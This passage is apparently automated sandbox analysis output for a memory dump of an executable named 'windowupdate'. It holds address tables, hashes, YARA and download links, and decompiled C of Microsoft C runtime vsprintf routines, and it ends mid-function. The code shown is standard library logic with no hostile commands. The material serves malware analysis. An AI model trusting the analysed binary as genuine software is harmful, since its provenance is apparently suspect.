                      0x00d5e95f
                      0x00d5e962
                      0x00000000
                      0x00000000
                      0x00d5e964
                      0x00d5e974
                      0x00d5e97f
                      0x00d5e984
                      0x00000000
                      0x00d5e984
                      0x00d5e94a
                      0x00000000
                      0x00d5e94a
                      0x00d5e8fe
                      0x00d5e905
                      0x00000000
                      0x00000000
                      0x00d5e907
                      0x00d5e917
                      0x00d5e922
                      0x00d5e927
                      0x00000000
                      0x00d5e927
                      0x00d5e8a1
                      0x00d5e8a7
                      0x00d5e8b3
                      0x00d5e8be
                      0x00d5e8c3
                      0x00000000
                      0x00d5e8c3
                      0x00d5e828
                      0x00d5e82c
                      0x00000000
                      0x00000000
                      0x00d5e82e
                      0x00000000
                      0x00d5e78c
                      0x00d5e791
                      0x00d5e7b5
                      0x00d5eab5
                      0x00d5eac2
                      0x00d5eac2
                      0x00d5e78a
                      0x00d5e72c
                      0x00d5e730
                      0x00000000
                      0x00000000
                      0x00d5e732
                      0x00000000
                      0x00d5e732
                      0x00d5e6fa
                      0x00d5e71e
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5E879
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: fe04aae733b97aacc072c48ee538e306bab3202a1b08be33f8004fd501c48fc2
                      • Instruction ID: b32c81c61701ec242c647d1ce6ba1af45abb26b92e1eebfb7fc63e7c6769844b
                      • Opcode Fuzzy Hash: fe04aae733b97aacc072c48ee538e306bab3202a1b08be33f8004fd501c48fc2
                      • Instruction Fuzzy Hash: 71C138B09042198BDF28EF14CC92BAAB3B4FF54305F1041D9EA4967291DB709E88CF79
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5DE00 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 250timeCOMMON
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5DE00(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v2744;
				signed int _v2748;
				char _v2752;
				signed int _v2756;
				signed int _v2760;
				char _v2764;
				char _v2768;
				intOrPtr _v2772;
				signed int _v2776;
				signed int _v2780;
				char _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				char _v2848;
				char _v2852;
				signed int _t127;
				void* _t135;
				signed int _t147;
				void* _t168;
				void* _t171;
				void* _t172;
				void* _t173;
				void* _t228;
				void* _t229;
				signed int _t230;
				void* _t231;

				_t229 = __esi;
				_t228 = __edi;
				_t173 = __ecx;
				_t172 = __ebx;
				_t127 =  *0xdf600c; // 0x71e60372
				_v8 = _t127 ^ _t230;
				if(_a20 == 0) {
					_v2768 = 0;
				} else {
					_v2768 = 1;
				}
				_v2772 = _v2768;
				_t235 = _v2772;
				if(_v2772 == 0) {
					_t171 = L00D84930(_t235, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t231 = _t231 + 0x18;
					if(_t171 == 1) {
						asm("int3");
					}
				}
				if(_v2772 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v2776 = 1;
						L12:
						_v2780 = _v2776;
						__eflags = _v2780;
						if(__eflags == 0) {
							_t168 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t231 = _t231 + 0x18;
							__eflags = _t168 - 1;
							if(_t168 == 1) {
								asm("int3");
							}
						}
						__eflags = _v2780;
						if(_v2780 != 0) {
							L00D66CC0(_t172,  &_v2848, _t229, _a24);
							_v2764 = 0;
							_v2760 = 0;
							_v2756 = 0;
							_v2752 = 0;
							_v2764 = _a12;
							_v2760 = _a16;
							_v2756 = 0;
							_v2816 = _a4 & 0x00000002;
							_v2812 = _a8 & 0x00000000;
							__eflags = _v2816 | _v2812;
							if((_v2816 | _v2812) != 0) {
								L20:
								_v2784 = 1;
								L21:
								_v2752 = _v2784;
								_t135 = E00D67A60( &_v2848);
								E00D66BE0( &_v2744, E00D66CA0( &_v2852,  &_v2764), _a4, _a8, _a20, _t135, _a28);
								_v2748 = E00D6BB20(_t172,  &_v2744, _t228, _t229);
								__eflags = _a12;
								if(_a12 != 0) {
									_v2824 = _a4 & 0x00000001;
									_v2820 = _a8 & 0x00000000;
									__eflags = _v2824 | _v2820;
									if((_v2824 | _v2820) == 0) {
										_t221 = _a4 & 0x00000002;
										_v2832 = _a4 & 0x00000002;
										_v2828 = _a8 & 0x00000000;
										__eflags = _v2832 | _v2828;
										if((_v2832 | _v2828) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v2756 - _a16;
												if(_v2756 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v2756 * 2)) = 0;
													L47:
													_t221 = _v2748;
													_v2808 = _v2748;
													E00D670F0( &_v2744);
													E00D67230( &_v2848);
													_t147 = _v2808;
													goto L48;
												}
												_t221 = 0;
												 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												_v2804 = 0xfffffffe;
												E00D670F0( &_v2744);
												E00D67230( &_v2848);
												_t147 = _v2804;
												goto L48;
											}
											_v2800 = 0xffffffff;
											E00D670F0( &_v2744);
											E00D67230( &_v2848);
											_t147 = _v2800;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v2748;
											if(_v2748 >= 0) {
												__eflags = _v2756 - _a16;
												if(_v2756 != _a16) {
													__eflags = 0;
													 *((short*)(_a12 + _v2756 * 2)) = 0;
												} else {
													 *((short*)(_a12 + _a16 * 2 - 2)) = 0;
												}
											} else {
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v2756 - _a16;
										if(_v2756 == _a16) {
											__eflags = _v2748;
											if(_v2748 < 0) {
												L32:
												goto L47;
											}
											__eflags = _v2748 - _a16;
											if(_v2748 <= _a16) {
												goto L32;
											}
											_v2796 = 0xffffffff;
											E00D670F0( &_v2744);
											E00D67230( &_v2848);
											_t147 = _v2796;
											goto L48;
										}
										 *((short*)(_a12 + _v2756 * 2)) = 0;
										goto L32;
									}
									__eflags = _v2748;
									if(_v2748 == 0) {
										goto L27;
									}
									_v2792 = 0xffffffff;
									E00D670F0( &_v2744);
									E00D67230( &_v2848);
									_t147 = _v2792;
									goto L48;
								}
								_t221 = _v2748;
								_v2788 = _v2748;
								E00D670F0( &_v2744);
								E00D67230( &_v2848);
								_t147 = _v2788;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v2784 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
							_t147 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t147, _t172, _v8 ^ _t230, _t221, _t228, _t229);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v2776 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t173))) = 0x16;
				_t147 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5de00
                      0x00d5de00
                      0x00d5de00
                      0x00d5de00
                      0x00d5de0b
                      0x00d5de12
                      0x00d5de19
                      0x00d5de27
                      0x00d5de1b
                      0x00d5de1b
                      0x00d5de1b
                      0x00d5de37
                      0x00d5de3d
                      0x00d5de44
                      0x00d5de5e
                      0x00d5de63
                      0x00d5de69
                      0x00d5de6b
                      0x00d5de6b
                      0x00d5de69
                      0x00d5de73
                      0x00d5dea6
                      0x00d5deaa
                      0x00d5debe
                      0x00d5debe
                      0x00d5dec8
                      0x00d5dece
                      0x00d5ded4
                      0x00d5dedb
                      0x00d5def5
                      0x00d5defa
                      0x00d5defd
                      0x00d5df00
                      0x00d5df02
                      0x00d5df02
                      0x00d5df00
                      0x00d5df03
                      0x00d5df0a
                      0x00d5df47
                      0x00d5df4e
                      0x00d5df54
                      0x00d5df5a
                      0x00d5df60
                      0x00d5df69
                      0x00d5df72
                      0x00d5df78
                      0x00d5df8e
                      0x00d5df94
                      0x00d5dfa0
                      0x00d5dfa6
                      0x00d5dfba
                      0x00d5dfba
                      0x00d5dfc4
                      0x00d5dfca
                      0x00d5dfda
                      0x00d5e005
                      0x00d5e015
                      0x00d5e01b
                      0x00d5e01f
                      0x00d5e05a
                      0x00d5e060
                      0x00d5e06c
                      0x00d5e072
                      0x00d5e117
                      0x00d5e120
                      0x00d5e126
                      0x00d5e132
                      0x00d5e138
                      0x00d5e18c
                      0x00d5e190
                      0x00d5e1c2
                      0x00d5e1c5
                      0x00d5e1fe
                      0x00d5e209
                      0x00d5e20d
                      0x00d5e20d
                      0x00d5e213
                      0x00d5e21f
                      0x00d5e22a
                      0x00d5e22f
                      0x00000000
                      0x00d5e22f
                      0x00d5e1c7
                      0x00d5e1cf
                      0x00d5e1d4
                      0x00d5e1e4
                      0x00d5e1ef
                      0x00d5e1f4
                      0x00000000
                      0x00d5e1f4
                      0x00d5e192
                      0x00d5e1a2
                      0x00d5e1ad
                      0x00d5e1b2
                      0x00000000
                      0x00d5e1b2
                      0x00d5e13a
                      0x00d5e13e
                      0x00d5e142
                      0x00d5e149
                      0x00d5e164
                      0x00d5e167
                      0x00d5e178
                      0x00d5e183
                      0x00d5e169
                      0x00d5e171
                      0x00d5e171
                      0x00d5e14b
                      0x00d5e158
                      0x00d5e158
                      0x00d5e149
                      0x00000000
                      0x00d5e187
                      0x00d5e078
                      0x00d5e07c
                      0x00d5e0b4
                      0x00d5e0ba
                      0x00d5e0bd
                      0x00d5e0d0
                      0x00d5e0d7
                      0x00d5e10f
                      0x00000000
                      0x00d5e10f
                      0x00d5e0df
                      0x00d5e0e2
                      0x00000000
                      0x00000000
                      0x00d5e0e4
                      0x00d5e0f4
                      0x00d5e0ff
                      0x00d5e104
                      0x00000000
                      0x00d5e104
                      0x00d5e0ca
                      0x00000000
                      0x00d5e0ca
                      0x00d5e07e
                      0x00d5e085
                      0x00000000
                      0x00000000
                      0x00d5e087
                      0x00d5e097
                      0x00d5e0a2
                      0x00d5e0a7
                      0x00000000
                      0x00d5e0a7
                      0x00d5e021
                      0x00d5e027
                      0x00d5e033
                      0x00d5e03e
                      0x00d5e043
                      0x00000000
                      0x00d5e043
                      0x00d5dfa8
                      0x00d5dfac
                      0x00000000
                      0x00000000
                      0x00d5dfae
                      0x00000000
                      0x00d5df0c
                      0x00d5df11
                      0x00d5df35
                      0x00d5e235
                      0x00d5e242
                      0x00d5e242
                      0x00d5df0a
                      0x00d5deac
                      0x00d5deb0
                      0x00000000
                      0x00000000
                      0x00d5deb2
                      0x00000000
                      0x00d5deb2
                      0x00d5de7a
                      0x00d5de9e
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5DFF9
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: ce79cc1399f980d605c6797440dec6f49353a9d78d376b91a4c3d25c6c8d744e
                      • Instruction ID: 1314a5e1ba1d2ac6643e6015cbefe9e95f18ba7ed0bc8cb658dae2ef0336835f
                      • Opcode Fuzzy Hash: ce79cc1399f980d605c6797440dec6f49353a9d78d376b91a4c3d25c6c8d744e
                      • Instruction Fuzzy Hash: B2C13870A043198BDF24EF14C852FAAB7B1BF15319F1441D9E81AA7681DB709E89CF72
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5D150 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5D150(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				char _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t117;
				void* _t125;
				signed int _t138;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t211 = __esi;
				_t210 = __edi;
				_t160 = __ecx;
				_t159 = __ebx;
				_t117 =  *0xdf600c; // 0x71e60372
				_v8 = _t117 ^ _t212;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t217 = _v1148;
				if(_v1148 == 0) {
					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t213 = _t213 + 0x18;
					if(_t158 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v1152 = 1;
						L12:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t213 = _t213 + 0x18;
							__eflags = _t155 - 1;
							if(_t155 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00D66CC0(_t159,  &_v1224, _t211, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L20:
								_v1160 = 1;
								L21:
								_v1128 = _v1160;
								_t125 = E00D67A60( &_v1224);
								E00D66A90( &_v1120, E00D66C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
								_v1124 = E00D6A850( &_v1120);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										_t207 = _v1208 | _v1204;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
													L47:
													_v1184 = _v1124;
													E00D67010( &_v1120);
													E00D67230( &_v1224);
													_t138 = _v1184;
													goto L48;
												}
												 *((char*)(_a12 + _a16 - 1)) = 0;
												_v1180 = 0xfffffffe;
												E00D67010( &_v1120);
												E00D67230( &_v1224);
												_t138 = _v1180;
												goto L48;
											}
											_v1176 = 0xffffffff;
											E00D67010( &_v1120);
											E00D67230( &_v1224);
											_t138 = _v1176;
											goto L48;
										}
										__eflags = _a16;
										if(_a16 != 0) {
											__eflags = _v1124;
											if(_v1124 >= 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
												} else {
													 *((char*)(_a12 + _a16 - 1)) = 0;
												}
											} else {
												_t207 = _a12;
												 *_a12 = 0;
											}
										}
										goto L47;
									}
									__eflags = _a16;
									if(_a16 != 0) {
										L27:
										__eflags = _v1132 - _a16;
										if(_v1132 == _a16) {
											__eflags = _v1124;
											if(_v1124 < 0) {
												L32:
												goto L47;
											}
											_t207 = _v1124;
											__eflags = _v1124 - _a16;
											if(_v1124 <= _a16) {
												goto L32;
											}
											_v1172 = 0xffffffff;
											E00D67010( &_v1120);
											E00D67230( &_v1224);
											_t138 = _v1172;
											goto L48;
										}
										 *(_a12 + _v1132) = 0;
										goto L32;
									}
									__eflags = _v1124;
									if(_v1124 == 0) {
										goto L27;
									}
									_v1168 = 0xffffffff;
									E00D67010( &_v1120);
									E00D67230( &_v1224);
									_t138 = _v1168;
									goto L48;
								}
								_t207 = _v1124;
								_v1164 = _v1124;
								E00D67010( &_v1120);
								E00D67230( &_v1224);
								_t138 = _v1164;
								goto L48;
							}
							__eflags = _a12;
							if(_a12 == 0) {
								goto L20;
							}
							_v1160 = 0;
							goto L21;
						} else {
							 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
							_t138 = E00D82900(L"buffer_count == 0 || buffer != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0) | 0xffffffff;
							L48:
							return E00D47280(_t138, _t159, _v8 ^ _t212, _t207, _t210, _t211);
						}
					}
					__eflags = _a12;
					if(_a12 != 0) {
						goto L11;
					}
					_v1152 = 0;
					goto L12;
				}
				 *((intOrPtr*)(L00D82F70(_t160))) = 0x16;
				_t138 = E00D82900(L"format != nullptr", L"common_vsprintf", L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0) | 0xffffffff;
				goto L48;
			}








































                      0x00d5d150
                      0x00d5d150
                      0x00d5d150
                      0x00d5d150
                      0x00d5d15b
                      0x00d5d162
                      0x00d5d169
                      0x00d5d177
                      0x00d5d16b
                      0x00d5d16b
                      0x00d5d16b
                      0x00d5d187
                      0x00d5d18d
                      0x00d5d194
                      0x00d5d1ae
                      0x00d5d1b3
                      0x00d5d1b9
                      0x00d5d1bb
                      0x00d5d1bb
                      0x00d5d1b9
                      0x00d5d1c3
                      0x00d5d1f6
                      0x00d5d1fa
                      0x00d5d20e
                      0x00d5d20e
                      0x00d5d218
                      0x00d5d21e
                      0x00d5d224
                      0x00d5d22b
                      0x00d5d245
                      0x00d5d24a
                      0x00d5d24d
                      0x00d5d250
                      0x00d5d252
                      0x00d5d252
                      0x00d5d250
                      0x00d5d253
                      0x00d5d25a
                      0x00d5d297
                      0x00d5d29e
                      0x00d5d2a4
                      0x00d5d2aa
                      0x00d5d2b0
                      0x00d5d2b9
                      0x00d5d2c2
                      0x00d5d2c8
                      0x00d5d2de
                      0x00d5d2e4
                      0x00d5d2f0
                      0x00d5d2f6
                      0x00d5d30a
                      0x00d5d30a
                      0x00d5d314
                      0x00d5d31a
                      0x00d5d32a
                      0x00d5d355
                      0x00d5d365
                      0x00d5d36b
                      0x00d5d36f
                      0x00d5d3aa
                      0x00d5d3b0
                      0x00d5d3bc
                      0x00d5d3c2
                      0x00d5d46d
                      0x00d5d473
                      0x00d5d47f
                      0x00d5d47f
                      0x00d5d485
                      0x00d5d4ce
                      0x00d5d4d2
                      0x00d5d504
                      0x00d5d507
                      0x00d5d540
                      0x00d5d540
                      0x00d5d546
                      0x00d5d549
                      0x00d5d54f
                      0x00d5d55b
                      0x00d5d566
                      0x00d5d56b
                      0x00000000
                      0x00d5d56b
                      0x00d5d50f
                      0x00d5d513
                      0x00d5d523
                      0x00d5d52e
                      0x00d5d533
                      0x00000000
                      0x00d5d533
                      0x00d5d4d4
                      0x00d5d4e4
                      0x00d5d4ef
                      0x00d5d4f4
                      0x00000000
                      0x00d5d4f4
                      0x00d5d487
                      0x00d5d48b
                      0x00d5d48f
                      0x00d5d496
                      0x00d5d4af
                      0x00d5d4b2
                      0x00d5d4c3
                      0x00d5d4c3
                      0x00d5d4c9
                      0x00d5d4b4
                      0x00d5d4ba
                      0x00d5d4ba
                      0x00d5d498
                      0x00d5d4a0
                      0x00d5d4a3
                      0x00d5d4a3
                      0x00d5d496
                      0x00000000
                      0x00d5d4cc
                      0x00d5d3c8
                      0x00d5d3cc
                      0x00d5d404
                      0x00d5d40a
                      0x00d5d40d
                      0x00d5d41d
                      0x00d5d424
                      0x00d5d45c
                      0x00000000
                      0x00d5d45c
                      0x00d5d426
                      0x00d5d42c
                      0x00d5d42f
                      0x00000000
                      0x00000000
                      0x00d5d431
                      0x00d5d441
                      0x00d5d44c
                      0x00d5d451
                      0x00000000
                      0x00d5d451
                      0x00d5d418
                      0x00000000
                      0x00d5d418
                      0x00d5d3ce
                      0x00d5d3d5
                      0x00000000
                      0x00000000
                      0x00d5d3d7
                      0x00d5d3e7
                      0x00d5d3f2
                      0x00d5d3f7
                      0x00000000
                      0x00d5d3f7
                      0x00d5d371
                      0x00d5d377
                      0x00d5d383
                      0x00d5d38e
                      0x00d5d393
                      0x00000000
                      0x00d5d393
                      0x00d5d2f8
                      0x00d5d2fc
                      0x00000000
                      0x00000000
                      0x00d5d2fe
                      0x00000000
                      0x00d5d25c
                      0x00d5d261
                      0x00d5d285
                      0x00d5d571
                      0x00d5d57e
                      0x00d5d57e
                      0x00d5d25a
                      0x00d5d1fc
                      0x00d5d200
                      0x00000000
                      0x00000000
                      0x00d5d202
                      0x00000000
                      0x00d5d202
                      0x00d5d1ca
                      0x00d5d1ee
                      0x00000000

                      APIs
                      • std::_Timevec::_Timevec.LIBCPMTD ref: 00D5D349
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: TimevecTimevec::_std::_
                      • String ID: %ls$buffer_count == 0 || buffer != nullptr$common_vsprintf$format != nullptr$minkernel\crts\ucrt\src\appcrt\stdio\output.cpp
                      • API String ID: 4219598475-3439959449
                      • Opcode ID: 9be546fd1aa882780f4f28a2cba452dfcf1d440ed559f095d963645171124621
                      • Instruction ID: d09294e7ce11d3604a7cfbdef5c10bd225b350f88194940bfff4ec7b7b7ac745
                      • Opcode Fuzzy Hash: 9be546fd1aa882780f4f28a2cba452dfcf1d440ed559f095d963645171124621
                      • Instruction Fuzzy Hash: FAC13AB09052198FDF34DF14CC91BAAB7B1AB41319F1441D8EA4967281DB70AE88CF7A
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D5E250 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 244timeCOMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 96%
                      			E00D5E250(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				char _v1120;
				signed int _v1124;
				char _v1128;
				char _v1132;
				signed int _v1136;
				char _v1140;
				char _v1144;
				intOrPtr _v1148;
				signed int _v1152;
				signed int _v1156;
				char _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				char _v1224;
				char _v1228;
				signed int _t117;
				void* _t125;
				signed int _t138;
				void* _t155;
				void* _t158;
				void* _t159;
				void* _t160;
				void* _t210;
				void* _t211;
				signed int _t212;
				void* _t213;

				_t211 = __esi;
				_t210 = __edi;
				_t160 = __ecx;
				_t159 = __ebx;
				_t117 =  *0xdf600c; // 0x71e60372
				_v8 = _t117 ^ _t212;
				if(_a20 == 0) {
					_v1144 = 0;
				} else {
					_v1144 = 1;
				}
				_v1148 = _v1144;
				_t217 = _v1148;
				if(_v1148 == 0) {
					_t158 = L00D84930(_t217, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8d, 0, L"%ls", L"format != nullptr");
					_t213 = _t213 + 0x18;
					if(_t158 == 1) {
						asm("int3");
					}
				}
				if(_v1148 != 0) {
					__eflags = _a16;
					if(_a16 == 0) {
						L11:
						_v1152 = 1;
						L12:
						_v1156 = _v1152;
						__eflags = _v1156;
						if(__eflags == 0) {
							_t155 = L00D84930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\output.cpp", 0x8e, 0, L"%ls", L"buffer_count == 0 || buffer != nullptr");
							_t213 = _t213 + 0x18;
							__eflags = _t155 - 1;
							if(_t155 == 1) {
								asm("int3");
							}
						}
						__eflags = _v1156;
						if(_v1156 != 0) {
							L00D66CC0(_t159,  &_v1224, _t211, _a24);
							_v1140 = 0;
							_v1136 = 0;
							_v1132 = 0;
							_v1128 = 0;
							_v1140 = _a12;
							_v1136 = _a16;
							_v1132 = 0;
							_v1192 = _a4 & 0x00000002;
							_v1188 = _a8 & 0x00000000;
							__eflags = _v1192 | _v1188;
							if((_v1192 | _v1188) != 0) {
								L20:
								_v1160 = 1;
								L21:
								_v1128 = _v1160;
								_t125 = E00D67A60( &_v1224);
								E00D66AF0( &_v1120, E00D66C80( &_v1228,  &_v1140), _a4, _a8, _a20, _t125, _a28);
								_v1124 = E00D6ADB0( &_v1120);
								__eflags = _a12;
								if(_a12 != 0) {
									_v1200 = _a4 & 0x00000001;
									_v1196 = _a8 & 0x00000000;
									__eflags = _v1200 | _v1196;
									if((_v1200 | _v1196) == 0) {
										_v1208 = _a4 & 0x00000002;
										_v1204 = _a8 & 0x00000000;
										_t207 = _v1208 | _v1204;
										__eflags = _v1208 | _v1204;
										if((_v1208 | _v1204) == 0) {
											__eflags = _a16;
											if(_a16 != 0) {
												__eflags = _v1132 - _a16;
												if(_v1132 != _a16) {
													_t207 = _a12 + _v1132;
													__eflags = _t207;
													 *_t207 = 0;
													L47:
													_v1184 = _v1124;
													E00D67050( &_v1120);
													E00D67230( &_v1224);
													_t138 = _v1184;
